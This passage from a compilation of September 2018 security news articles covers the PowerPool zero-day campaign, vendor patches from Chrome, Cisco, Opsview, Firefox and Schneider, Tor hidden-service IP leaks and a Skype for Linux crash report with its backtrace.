The hackers, whose possible origins have not been discussed by the security firm, have used the zero-day to overwrite C:\Program Files(x86)\Google\Update\GoogleUpdate.exe, a legitimate updater for Google applications. Since this file is regularly executed in Windows with administrative privileges, overwriting it with their malware has allowed the attackers to obtain elevated permissions on the targeted system.

ESET believes PowerPool attacks begin with a malware-carrying email being sent to the targeted user. While the campaign involving the zero-day appears to be highly targeted, an interesting spam campaign spotted by SANS in May, which used Symbolic Link (.slk) files for malware distribution, was apparently carried out by the same group.

The first stage malware used by PowerPool, which is delivered via the initial emails, is a backdoor designed for reconnaissance purposes. If the infected machine presents an interest to the attackers, the malware downloads a second stage backdoor capable of executing commands on the system, uploading and downloading files, killing processes, and listing folders.

The files downloaded by the second stage malware to compromised devices include several open source tools that allow the attackers to move laterally on the network. The list includes PowerDump, PowerSploit, SMBExec, Quarks PwDump, and FireMaster.

ESET has described this second stage malware as “clearly not a state-of-the-art APT backdoor.”

“This specific campaign targets a limited number of users, but don’t be fooled by that: it shows that cybercriminals also follow the news and work on employing exploits as soon as they are publicly available,” ESET concluded.

Latest Version of Chrome Improves Password Management, Patches 40 Flaws
6.9.2018 securityweek

Google this week celebrates 10 years of its Chrome web browser with the release of a new version that provides users with security improvements, new features, and patches for 40 vulnerabilities.

The highly popular web browser now has an improved password manager that makes it easier for users to have a unique and strong password for each site. When a user is setting a new password, Chrome can generate it and save it, so that it is easily accessible on both computers and phones.

Chrome 69 also brings updated site indicators, as it no longer marks HTTPS websites with a green lock. Instead, the indicator is now grey, given that Google considers HTTPS connections the norm.

Starting with Chrome 68, Google is marking sites served over HTTP connections as “Not Secure”, in order to warn users that data transmitted between the site and the browser is susceptible to man-in-the-middle attacks and other types of threats. Attackers could even modify the content of web pages before they are delivered to the user.

Some of the new features in the browser include answers directly in the address bar (the Omnibox), improved site shortcut management, and new looks that include modified shape of tabs to make site icons easier to see.

Chrome Enterprise 69 now blocks third-party software to provide users with improved stability, requires users to grant explicit permission for Adobe Flash to run on sites still using it (the permission is asked after each browser restart), and prevents password reuse with a Password Alert policy.

Google also addressed a total of 40 security vulnerabilities with the release of Chrome 69, 22 of which were reported by external researchers. Of these, 7 were High risk flaws, 13 were Medium severity, and 2 were Low risk bugs.

Some of the addressed issues include out-of-bounds writes (in V8, Blink, WebAudio, Mojo, SwiftShader, Little-CMS, PDFium, and WebRTC), an integer overflow in Skia, use-after-free bugs (in WebRTC and Memory Instrumentation), Site Isolation bypasses, a cross-origin pixel leak, local file access, a content security policy bypass, a credit card information leak, URL spoofs, and a stack buffer overflow in SwiftShader.

Google paid nearly $30,000 in bug bounty rewards to the reporting researchers, but the company hasn’t revealed information on all of the awarded bounties.

The latest browser iteration is now available for download for Windows, Mac and Linux as Chrome 69.0.3497.81.

Multiple Vulnerabilities Addressed in Opsview Monitor
6.9.2018 securityweek

Opsview recently addressed a series of remote code-execution, command-execution and local privilege-escalation vulnerabilities in the Opsview Monitor.

A proprietary monitoring application for networks and applications, Opsview Monitor “helps DevOps teams deliver smarter business services by providing unified insight into their dynamic IT operations whether on-premises, in the cloud, or hybrid,” the company says.

The software is impacted by five vulnerabilities that could provide attackers with the ability to access the management console and execute commands on the operating system.

Discovered by Core Security researchers earlier this year, the bugs were confirmed to impact all supported versions of Opsview Monitor (5.4, 5.3 and 5.2). In addition to patches (the 5.4.2 and 5.3.1 updates) for the affected versions, Opsview also released a new product iteration that removed the issues from the start.

A virtual appliance deployed inside the organization's network infrastructure, Opsview Monitor is bundled with a Web Management Console that allows for the monitoring and management of hosts and their services.

The first two issues found in the appliance could be abused to execute malicious JavaScript code in the context of a legitimate user. These are CVE-2018-16148, a reflected Cross-Site Scripting (XSS) in the 'diagnosticsb2ksy' parameter of the '/rest' endpoint, and CVE-2018-16147, a persistent XSS in the 'data' parameter of the '/settings/api/router' endpoint.

“The input will be stored without any sanitization and rendered every time the /settings section is visited by the user. […] this XSS is self-stored and it's executed only in the context of the victim's session. [The] vulnerability can be exploited by an attacker to gain persistency and execute the malicious code each time the victim accesses to the settings section,” Core Security explains.

Two other vulnerabilities could allow an attacker to obtain command execution on the system as the nagios user. Tracked as CVE-2018-16146 and CVE-2018-16144, both of these are improper sanitization bugs.

Tracked as CVE-2018-16145, the fifth vulnerability could lead to local privilege escalation. An attacker could edit a specific part of a script to execute code once the appliance is rebooted (at boot, scripts impersonate the nagios user during their execution).

The bugs were reported to Opsview in early May and were confirmed within a week. The company released Opsview Monitor 6.0 at the end of July and pushed fixes for the previous software iterations last week.

Uber Announces Ramped Up Passenger Security
6.9.2018 securityweek Security

Uber chief Dara Khosrowshahi said on Wednesday the smartphone-summoned ride service is reinforcing safeguards for passengers and their personal information.

Features to be added to the app in the coming months include "Ride Check," which uses location tracking already built into the service to detect when cars have stopped unexpectedly.

If a crash is suspected, the driver and passenger will receive a prompt on their phones to order a courtesy ride or use the in-app emergency call button introduced earlier this year.

"This technology can also flag trip irregularities beyond crashes that might, in some rare cases, indicate an increased safety risk," Khosrowshahi said in a blog post.

"For example, if there is a long, unexpected stop during a trip, both the rider and the driver will receive a Ride Check notification to ask if everything is OK."

Uber, which operates in 65 countries, has disrupted transport in many locations despite regulatory hurdles and resistance from taxi operators.

The company has been touting a safety-first message amid plans for an initial public offering of shares late next year.

Khosrowshahi said the service will begin leaving pick-up and drop-off addresses out of drivers' trip history logs, showing only general areas to avoid creating databases of sensitive locations such as home addresses.

The service already lets drivers and passengers waiting to be picked up communicate through the app without revealing their phone numbers. People can also request pick-ups at intersections instead of specific street addresses.

"Uber has a responsibility to help keep people safe, and it's one we take seriously," Khosrowshahi said.

"We want you to have peace of mind every time you use Uber, and hope these features make it clear that we've got your back."

Cisco Patches Serious Flaws in RV, SD-WAN, Umbrella Products
6.9.2018 securityweek

Cisco informed customers on Wednesday that patches are available for over a dozen critical and high severity vulnerabilities affecting the company’s RV series, SD-WAN, Umbrella and other products.

Two of the flaws have been rated “critical” by Cisco. One of them, CVE-2018-0423, is a buffer overflow vulnerability in the web-based management interface of various RV series firewalls and routers. The security hole allows a remote and unauthenticated attacker to cause a denial-of-service (DoS) condition or to execute arbitrary code.

The second flaw assigned a “critical” rating by the networking giant is CVE-2018-0435 and it impacts the Cisco Umbrella API. A remote attacker could leverage the vulnerability to read or modify data across multiple organizations, but exploitation requires authentication. Cisco noted that the bug has been addressed in the API and no user interaction is required to apply the patch.

The critical vulnerability affecting RV series devices was reported to Cisco by Qingtang Zheng of the 360 ESG CodeSafe Team, who also discovered three additional high severity flaws in the management interface of these products.

Two of the flaws allow an attacker to remotely gain access to sensitive information and one can be exploited for arbitrary command execution, but the latter requires authentication.

The Umbrella solution is also affected by some high severity flaws. Specifically, the Umbrella Enterprise Roaming client has a couple of weaknesses that can be exploited by an authenticated attacker to elevate privileges to “Administrator.” These issues were discovered by a researcher from Critical Start, which has published its own blog post providing detailed technical information.

Cisco’s SD-WAN solution is also impacted by high severity vulnerabilities. They can allow hackers to gain access to sensitive data, execute commands as root, and elevate privileges, but some require either local access and/or authentication.

The company also informed customers that patches are available for serious privilege escalation and information disclosure bugs in WebEx, a DoS flaw in Prime Access Registrar, a privilege escalation in Data Center Network Manager, and two command injections in the Integrated Management Controller (IMC) software.

Cisco is not aware of any instances where these vulnerabilities have been exploited for malicious purposes.

Man Charged With Cyberstalking Women for Explicit Photos
6.9.2018 securityweek Cyber

LOS ANGELES (AP) — A former NASA contractor who allegedly threatened to publish nude photos of seven women unless they sent him other explicit pictures has been arrested at his Los Angeles home.

Richard Bauer was arrested Wednesday.

Prosecutors say Bauer contacted some victims through Facebook and got them to reveal information he could use to reset their online passwords. He allegedly got other victims to install computer malware that allowed him to obtain email and website passwords.

Bauer allegedly threatened to post nude photos he'd obtained of the victims online unless they sent more photos.

He's facing 14 federal charges of stalking, unauthorized computer access and identity theft, which carry a possible 64-year sentence.

Bauer worked at NASA's Armstrong Flight Research Center in Southern California.

It's unclear if he has a lawyer.

VPN Company AnchorFree Raises $295 Million
6.9.2018 securityweek IT

AnchorFree, the company that makes the popular Hotspot Shield virtual private network (VPN) software, on Wednesday announced that it raised $295 million in a new funding round.

The latest funding brings the total raised by the California-based company to nearly $358 million, which represents a significant amount for a VPN services provider. These types of services have become increasingly popular following the numerous privacy-related scandals involving governments and private firms.

The round was led by media and tech investment group WndrCo with participation from Accel, 8VC, SignalFire, Green Bay Ventures and other investors and executives. Representatives of WndrCo and Accel have joined the company’s board of directors.

According to AnchorFree, the newly secured funds will be used to “further product development and market expansion and drive M&A activity.”

AnchorFree claims its products provide enterprise-level privacy and security for consumers’ mobile devices. This includes protection against ISPs and websites collecting identity data, compromised public Wi-Fi connections, phishing attacks, and malware.

The company, led by CEO and co-founder David Gorodyansky, says its products have been downloaded over 650 million times by users across 190 countries, with 250,000 new downloads each day.

AnchorFree also offers a VPN solution for small and medium-sized businesses, Hotspot Shield for Business. Its VPN technology, called Hydra, has been widely adopted by app developers and licensed by many of the world’s cybersecurity and telecoms companies.

“Anyone who accesses the Internet is vulnerable to data theft and an invasion of online privacy which has real, impactful consequences, and David and the AnchorFree team are deeply mission-driven to address this,” said WndrCo Founding Partner Sujay Jaswa.

“AnchorFree has the two most-downloaded mobile security products, including the #1 mobile VPN product, because they have the fastest most robust technology and they work for the needs of consumers, protecting against phishing, malware, and spam in addition to providing secure Internet access. This growth will only accelerate as the world’s Internet security problems continue to grow, and we look forward to supporting David and his team as they further AnchorFree’s global success in tackling this outstanding market opportunity,” Jaswa added.

AnchorFree was accused last year by the Center for Democracy & Technology (CDT), a nonprofit technology advocacy organization, of collecting user data through Hotspot Shield and sharing it with advertisers. The CDT filed a complaint with the U.S. Federal Trade Commission (FTC) over these allegations. AnchorFree has denied the accusations.

Earlier this year, a researcher disclosed the details of a vulnerability that exposed the names and locations of Hotspot Shield users. The expert made his findings public after claiming that the vendor ignored his attempts to report the flaw. A patch was released a few days later.

Flaw in Schneider PLC Allows Significant Disruption to ICS
6.9.2018 securityweek ICS

A vulnerability discovered in some of Schneider Electric’s Modicon programmable logic controllers (PLCs) may allow malicious actors to cause significant disruption to industrial control systems (ICS).

The flaw was identified by Yehonatan Kfir, CTO of industrial cybersecurity firm Radiflow, as part of an ongoing project whose goal is finding new ICS vulnerabilities. Advisories for this security hole were published recently by both Schneider Electric and ICS-CERT.

The vulnerability, tracked as CVE-2018-7789 and described as an issue related to improper checking for unusual or exceptional conditions, can be exploited by an attacker to remotely reboot Modicon M221 controllers.

According to Schneider, all Modicon M221 controllers running firmware versions prior to, which includes a patch for the issue, are impacted.

Radiflow’s Kfir told SecurityWeek that while Schneider responded to the vulnerability in a “highly professional manner,” his company does not agree with the severity rating assigned by the vendor – ICS-CERT and Schneider assigned a CVSS score of 4.8, which puts the flaw in the “medium severity” category.

“In general the assessment for the scoring is usually assessed from the perspective of IT, which takes into account the vulnerability’s impact on the potential for confidential data to be compromised,” Kfir explained. “This of course is important, although less relevant to OT operations and as such the reason we think that the score could have been higher.”

“This CVE could have resulted in the controller getting stuck and causing its communication to drop from the OT network. Disconnecting the PLC from the HMI certainly has more than a low impact on the availability of the OT network. To recover from such a problem, an onsite visit from a technician to do a power reset is required. The impact of such a situation on availability seems much higher than reflected in the scoring,” the expert added.

In a press release Radiflow will publish on Thursday, the company says an attack exploiting this flaw “would cause significant downtime to the ICS network.”


The CVSS score is also lowered due to the “attack complexity” metric being described as “high.” Kfir admits that an attacker would need to be familiar with Schneider’s proprietary protocols in order to exploit the bug, but argued that threat groups focused on targeting industrial systems – one good example is the actor behind the Triton attack – have already demonstrated these types of capabilities.

“Although it may be complex for a novice to exploit this vulnerability, it would not have been difficult at all for experienced hackers to leverage this vulnerability,” Kfir said.

Radiflow says its researchers have identified two ways to exploit the vulnerability and they both work remotely. Worryingly, Kfir told SecurityWeek that a simple Shodan search revealed over 100 vulnerable devices directly accessible from the Internet.

“It is just a matter of a few clicks that could have led to a cyberattack to take down those vulnerable PLCs,” Kfir said.

Earlier this year, Radiflow reported that a piece of cryptocurrency mining malware worked its way onto servers connected to an OT network at a wastewater facility in Europe.

Other vulnerabilities in Modicon M221 controllers

Different advisories published in recent days by ICS-CERT and Schneider Electric describe three other vulnerabilities discovered by researchers in Modicon M221 controllers.

These security holes, all classified as “high severity,” can be exploited to upload the original PLC program, and decode the device’s password using a rainbow table.

Irfan Ahmed, Hyunguk Yoo, Sushma Kalle, and Nehal Ameen of the University of New Orleans have been credited for finding these flaws.

These security holes have also been addressed by Schneider with the release of firmware version

What's GRU? A Look at Russia's Shadowy Military Spies
6.9.2018 securityweek BigBrothers

MOSCOW (AP) — GRU isn't as well-known a baleful acronym as KGB or FSB. But Russia's military intelligence service is attracting increasing attention as allegations mount of devious and deadly operations on and off the field of battle.

The latest charge came Wednesday, when Britain identified two suspects in this year's nerve-agent poisonings as GRU agents.

An overview of the GRU:


Formally named the Main Directorate of the General Staff of the Armed Forces, the agency is almost universally referred to by its former acronym GRU.

It is the most shadowy of Russia's secret services. When its previous director Igor Sergun died in 2016, the Kremlin announcement was so terse that it gave neither the date, cause or place of death.

The agency has an apparently broad mandate. According to the Defense Ministry website, it is tasked not only with "ensuring conditions conducive to the successful implementation of the Russian Federation's defense and security policy" but with providing officials intelligence "that they need to make decisions in the political, economic, defense, scientific, technical and environmental areas."


Britain claims that two GRU agents carried out this spring's attack with the nerve agent Novichok on Sergei Skripal, a former GRU officer who became a British double agent, and his daughter. Both survived the poisoning in the city of Salisbury, but three months later two area residents were sickened by the same nerve agent, one of them fatally — it is believed they found the discarded bottle that had carried the Skripals' poison.

This week's claim came less than two months after the U.S. indicted 12 alleged GRU agents for hacking into the Hillary Clinton presidential campaign and the Democratic Party and releasing tens of thousands of private communications, part of a sweeping conspiracy by the Kremlin to meddle in the 2016 U.S. election.

Also this year, the investigative group Bellingcat reported that a GRU officer was in charge of operations in eastern Ukraine, where Russia-backed separatists were fighting Ukrainian forces, in July 2014 when a Malaysian passenger airliner was shot down, killing all 298 people aboard. International investigators say the plane was shot down by a mobile missile launcher brought in from Russia. The GRU officer named by Bellingcat reportedly was responsible for weapons transfers.

Russia's RBC news service reported this year that the GRU oversees Russian mercenaries in Syria, fighting there as a so-called shadow army.

Russian authorities generally deny allegations against the GRU and refuse to discuss its activities. They said they didn't recognize the suspects Britain named Wednesday in the Salisbury poisoning.


The GRU is one arm of Russia's extensive security and intelligence apparatus, which also includes the Foreign Intelligence Service, known as the SVR, and the Federal Security Service, or FSB, which conducts domestic intelligence and counterintelligence. The SVR and FSB were spun off from the KGB after the collapse of the Soviet Union. A former KGB agent, Vladimir Putin ran the FSB before ascending to the presidency.

And as president, Putin names the top brass in the GRU. Of all the agencies, the FSB looms largest in Russians' minds because it hunts domestic threats. The GRU, created under Soviet founder Vladimir Lenin, has a more ruthless reputation, but focuses its energies on foreign threats.

The agencies' operations appear to both compete and cooperate.

Pavel Felgenhauer, an independent Moscow-based military analyst, told The Associated Press that if "the SVR runs into military intelligence, they have to share it with the GRU; that means they try not to run into military intelligence and tell their agents not to report anything military even if they know it. The other way around, military or GRU assets are asked never to report anything political."

But in the case of the alleged U.S. election-related hacking, he said, "I believe that was an inter-service operation, because it's not military but they gained some kind of hacking access and then they shared it with the FSB and the SVR."

Firefox Drops Support for Windows XP
6.9.2018 securityweek Safety

Effective this week, Windows XP is no longer supported by Firefox. More than four years after Microsoft stopped supporting the platform, Mozilla is making a similar move.

Last year, the organization said support for Windows XP was expected to be dropped by June 2018, but the browser developer took a few more months to make that happen.

On Wednesday, Mozilla announced the release of Firefox 62 and also revealed that it updated Firefox ESR (Extended Support Release) to version 60.2. With these releases, Mozilla cut support for Firefox ESR 52, which was the last version of Firefox with Windows XP support.

“At the end of February 2016, XP users made up 12% of release Firefox. By the end of February 2017, XP users made up 8% of release Firefox. If this trend continued without much change after we switched XP users to ESR, XP Firefox users would presently amount to about 2% of release users,” Mozilla says.

While Firefox ESR 52 continues to be available for download, it no longer receives security patches, meaning that any vulnerability found in the browser will remain unpatched.

With Chrome no longer supporting the platform since version 49, and Internet Explorer 8, the browser most commonly used as the default on the platform, having received no security updates for more than two years, Windows XP users are left with no major browser that could keep them safe from exploits while browsing the Internet.

Although still widely used in organizations, Windows XP is currently a nearly-17-year-old operating system that hasn’t received security patches for over four years (although Microsoft did release emergency fixes last year, to address Shadow Brokers-related bugs exploited in the global WannaCry outbreak).

“It required effort, and it required devoting resources to supporting XP well after Microsoft stopped doing so. It meant we couldn’t do other things, since we were busy with XP,” Mozilla says.

Users impacted by the recent change in Firefox are advised to upgrade to a newer operating system to continue receiving patches not only for Mozilla’s applications, but also for other software their computers depend on.

In addition to dropping support for XP, Firefox now includes a preference that allows users to distrust certificates issued by Symantec (by setting "security.pki.distrust_ca_policy" to 2 in about:config). This is yet another step towards removing all trust for Symantec-issued certificates in Firefox 63.

Firefox 62, Mozilla notes in an advisory, also addresses several vulnerabilities: 1 Critical severity, 3 High risk, 2 Medium severity, and 3 Low risk. Affecting Firefox 61 and Firefox ESR 60.1, the most important of these could potentially be exploited to run arbitrary code.

Malware Found on USB Drives Shipped With Schneider Solar Products
6.9.2018 securityweek ICS

Schneider Electric recently informed customers that some of the USB flash drives shipped by the company with its Conext ComBox and Conext Battery Monitor products were infected with malware.

Conext ComBox and Conext Battery Monitor are both part of Schneider’s solar energy offering. ComBox is a communications and monitoring device for installers and operators of Conext solar systems, while Battery Monitor is designed to indicate hours of battery-based runtime and determine the charging state for a battery bank.

According to Schneider, some USB removable media devices shipped with these products were exposed to malware during manufacturing at a third-party supplier’s facility.

While the France-based industrial giant says the malware should be blocked by all major cybersecurity products, it has advised customers not to use and “securely discard” the compromised devices.

“These USB removable media contain user documentation and non-essential software utilities. They do not contain any operational software and are not required for the installation, commissioning, or operation of the products mentioned above. This issue has no impact on the operation or security of the Conext Combox or Conext Battery Monitor products,” Schneider said in an advisory published last month.

Users who believe they may have accessed one of the potentially impacted flash drives have been advised to perform a full scan of their system. The problematic drives have been shipped with all versions of Conext ComBox (sku 865-1058) and all versions of Conext Battery Monitor (sku 865-1080-01).

SecurityWeek has reached out to Schneider to obtain more information regarding the incident, including how many customers were affected and the type of malware found on the devices, but the company has yet to respond.


Incidents involving major companies delivering USB drives infected with malware along the supply chain are not unheard of. Last year, IBM informed customers that it had been shipping malware-infected initialization USBs for its Storwize storage systems, which are used by Lenovo.

The pieces of malware involved in these incidents may not have been advanced, but infected USB drives can pose a serious threat to organizations – particularly in industrial environments where air-gapping is often still used to protect critical systems – and sophisticated threat actors have been known to develop complex USB malware.

Cisco fixes 32 security vulnerabilities in its products, including three critical flaws
6.9.2018 securityaffairs

Cisco has released thirty security advisories addressing a total of 32 vulnerabilities in its products, including three critical flaws.

The good news is that the tech giant is not aware of any exploitation of the addressed vulnerabilities in attacks in the wild.

Three flaws are rated as critical; one of them is the recently discovered CVE-2018-11776 Apache Struts remote code execution vulnerability.

The other critical issues addressed by Cisco are the Cisco Umbrella API Unauthorized Access Vulnerability (CVE-2018-0435) and the Cisco RV110W, RV130W, and RV215W Routers Management Interface Buffer Overflow Vulnerability (CVE-2018-0423).

The critical flaw CVE-2018-0435 affects the Cisco Umbrella API; a remote, authenticated attacker could leverage it to read or modify data across multiple organizations.

“A vulnerability in the Cisco Umbrella API could allow an authenticated, remote attacker to view and modify data across their organization and other organizations.” reads the security advisory.

“The vulnerability is due to insufficient authentication configurations for the API interface of Cisco Umbrella. An attacker could exploit this vulnerability to view and potentially modify data for their organization or other organizations. A successful exploit could allow the attacker to read or modify data across multiple organizations.”

The vulnerability has been addressed in the API itself, so no action is required from end users.

The Umbrella solution is also affected by other high-severity vulnerabilities: two flaws in the Umbrella Enterprise Roaming client could be exploited by an authenticated attacker to elevate privileges to “Administrator.”

The second of the Cisco-specific critical flaws, CVE-2018-0423, is a buffer overflow vulnerability that resides in the web-based management interface of several firewalls and routers in the RV series. It could be exploited by a remote, unauthenticated attacker to trigger a denial-of-service (DoS) condition or to execute arbitrary code.

“A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to cause a denial of service condition or to execute arbitrary code.” reads the security advisory.

“The vulnerability is due to improper boundary restrictions on user-supplied input in the Guest user feature of the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to a targeted device, triggering a buffer overflow condition. A successful exploit could allow the attacker to cause the device to stop responding, resulting in a denial of service condition, or could allow the attacker to execute arbitrary code.”

The flaw could be exploited by an attacker by sending malicious requests to a targeted device, triggering a buffer overflow condition.

Cisco issued security updates for serious privilege escalation and information disclosure flaws in WebEx, a DoS flaw in Prime Access Registrar, two command injections in the Integrated Management Controller (IMC) software, and a privilege escalation in Data Center Network Manager.

Many misconfigured Tor sites expose the public IP address via SSL certificates
6.9.2018 securityaffairs Safety

Yonathan Klijnsma, a threat researcher at RiskIQ, has discovered that many misconfigured Tor sites using SSL certificates could expose the public IP addresses of the underlying servers.

Properly configured servers hosting hidden services have to listen only on the localhost address ( rather than on any public IP address.

“The way these guys are messing up is that they have their local Apache or Nginx server listening on any (* or IP address, which means Tor connections will work obviously, but also external connections will as well,” Klijnsma explained to BleepingComputer. “This is especially true if they don’t use a firewall. These servers should be configured to only listen on”

The expert highlighted that it is quite easy to find misconfigured servers that expose their public IP address.

Every time an administrator of a hidden service adds an SSL certificate to a site, it associates the .onion domain with the certificate. The Common Name (CN) field of the certificate reports the .onion address of the hidden service.


When administrators misconfigure a server so that it listens on a public IP address, the SSL certificate associated with the website will be used for the public IP address.

Klijnsma discovered the misconfigured servers by crawling the Internet and associating SSL certificates with the IP addresses hosting them. In this way, the expert identified the misconfigured Tor hidden services and their corresponding public IP addresses.

Yonathan Klijnsma, on Twitter (7:31 PM - Aug 4, 2018): “Another #Tor hidden service exposed through an incorrect configuration of the listening server. Hiding your private forum on the deep dark (and still very public) web. Certificate can be found here (host is still live!): …”

The expert concluded that, to avoid exposing the public IP address of a Tor hidden service, its web server should listen only on

An untold story of a memory corruption bug in Skype
6.9.2018 securityaffairs Cyber

A security expert discovered that Skype has a malloc() memory corruption vulnerability that could be triggered while a user shares media or files with someone during a call.
Tested on: Linux zero 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux (Ubuntu 18.04 LTS)
Product affected: Skype for Linux (skypeforlinux_8.27.0.85_amd64.deb)

Steps to reproduce this issue:
1. Open Skype
2. Call anyone
3. During the call try sharing the media or files to the same person
4. Skype crashes.

While on a call with one of my colleagues, I tried sharing a file, which froze my Skype and then crashed it. Moving further, I tried to debug it with `gdb` and this is what I got.

$ *** Error in `/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896': malloc(): memory corruption: 0x000000000641ff80 ***
======= Backtrace: =========
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896(malloc+0x1c)[0x47cc34c]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x4e3b90b]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896(_ZN11file_dialog14ShowOpenDialogERKNS_14DialogSettingsERKN4base8CallbackIFvbRKSt6vectorINS3_8FilePathESaIS6_EEELNS3_8internal8CopyModeE1ELNSC_10RepeatModeE1EEE+0x2d)[0x4e3be3d]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896(_ZN4atom15WebDialogHelper14RunFileChooserEPN7content15RenderFrameHostERKNS1_17FileChooserParamsE+0x33c)[0x4e4d90c]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1d8c9b4]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1d8c858]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1d86c2f]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x2347525]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x48001eb]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47ed9db]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47edcf8]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47ee0d1]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47c4159]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47affc0]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1bfef9e]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1bfed9e]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1d65ead]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1e67b93]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1a4c63c]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x19e6d0d]
======= Memory map: ========
000dc000-00200000 rw-p 00000000 07:15 15088 /snap/skype/51/usr/share/skypeforlinux/skypeforlinux
00200000-01802000 r--p 00124000 07:15 15088 /snap/skype/51/usr/share/skypeforlinux/skypeforlinux
01802000-04f35000 r-xp 01726000 07:15 15088 /snap/skype/51/usr/share/skypeforlinux/skypeforlinux
04f35000-04f4b000 rw-p 04e59000 07:15 15088 /snap/skype/51/usr/share/skypeforlinux/skypeforlinux
04f4b000-05818000 rw-p 00000000 00:00 0
06322000-0749a000 rw-p 00000000 00:00 0 [heap]
af8f00000-af8f80000 rw-p 00000000 00:00 0
2a231d00000-2a231d80000 rw-p 00000000 00:00 0
4342f600000-4342f6ab000 rw-p 00000000 00:00 0
4dab7f00000-4dab800a000 rw-p 00000000 00:00 0
5e2b1980000-5e2b1a00000 rw-p 00000000 00:00 0
683f0500000-683f0580000 rw-p 00000000 00:00 0
74c45800000-74c45880000 rw-p 00000000 00:00 0
7f95e280000-7f95e300000 rw-p 00000000 00:00 0
8590f380000-8590f400000 rw-p 00000000 00:00 0
a95ac180000-a95ac200000 rw-p 00000000 00:00 0
b464c9b8000-b464c9c0000 rw-p 00000000 00:00 0
b464c9c0000-b464c9c4000 ---p 00000000 00:00 0
bf52cd00000-bf52cd80000 rw-p 00000000 00:00 0
c191e080000-c191e100000 rw-p 00000000 00:00 0
fe78f400000-fe78f480000 rw-p 00000000 00:00 0
14c588080000-14c588100000 rw-p 00000000 00:00 0
16dfa8300000-16dfa8380000 rw-p 00000000 00:00 0
1b328cb00000-1b328cb80000 rw-p 00000000 00:00 0
1de101180000-1de101200000 rw-p 00000000 00:00 0
1e993f000000-1e993f080000 rw-p 00000000 00:00 0
20c071f00000-20c071f80000 rw-p 00000000 00:00 0
20c61d680000-20c61d700000 rw-p 00000000 00:00 0
2240c1900000-2240c19ab000 rw-p 00000000 00:00 0
22628d700000-22628d780000 rw-p 00000000 00:00 0
25bf77500000-25bf77580000 rw-p 00000000 00:00 0
26ce1a280000-26ce1a300000 rw-p 00000000 00:00 0
26daf9ead000-26daf9f00000 ---p 00000000 00:00 0
26daf9f00000-26daf9f03000 rw-p 00000000 00:00 0
26daf9f03000-26daf9f04000 ---p 00000000 00:00 0
26daf9f04000-26daf9f2d000 rwxp 00000000 00:00 0
26daf9f2d000-26daf9f80000 ---p 00000000 00:00 0
26daf9f80000-26daf9f83000 rw-p 00000000 00:00 0
26daf9f83000-26daf9f84000 ---p 00000000 00:00 0
26daf9f84000-26daf9fad000 rwxp 00000000 00:00 0
26daf9fad000-26dafa000000 ---p 00000000 00:00 0
26dafa000000-26dafa003000 rw-p 00000000 00:00 0
26dafa003000-26dafa004000 ---p 00000000 00:00 0
26dafa004000-26dafa02d000 rwxp 00000000 00:00 0
26dafa02d000-26dafa080000 ---p 00000000 00:00 0
26dafa080000-26dafa083000 rw-p 00000000 00:00 0
26dafa083000-26dafa084000 ---p 00000000 00:00 0
26dafa084000-26dafa0ff000 rwxp 00000000 00:00 0
26dafa0ff000-26dafa100000 ---p 00000000 00:00 0
26dafa100000-26dafa103000 rw-p 00000000 00:00 0
26dafa103000-26dafa104000 ---p 00000000 00:00 0
26dafa104000-26dafa17f000 rwxp 00000000 00:00 0
26dafa17f000-26dafa180000 ---p 00000000 00:00 0
26dafa180000-26dafa183000 rw-p 00000000 00:00 0
26dafa183000-26dafa184000 ---p 00000000 00:00 0
26dafa184000-26dafa1ff000 rwxp 00000000 00:00 0
26dafa1ff000-26dafa200000 ---p 00000000 00:00 0
26dafa200000-26dafa203000 rw-p 00000000 00:00 0
26dafa203000-26dafa204000 ---p 00000000 00:00 0
26dafa204000-26dafa27f000 rwxp 00000000 00:00 0
26dafa27f000-26db19ead000 ---p 00000000 00:00 0
2adf28e80000-2adf28f00000 rw-p 00000000 00:00 0
2b4467900000-2b4467980000 rw-p 00000000 00:00 0
2bb8adb80000-2bb8adc00000 rw-p 00000000 00:00 0
2dadb8480000-2dadb8500000 rw-p 00000000 00:00 0
2fa869080000-2fa869100000 rw-p 00000000 00:00 0
325d21200000-325d21280000 rw-p 00000000 00:00 0
3462c4b00000-3462c4b80000 rw-p 00000000 00:00 0
34a98af80000-34a98b000000 rw-p 00000000 00:00 0
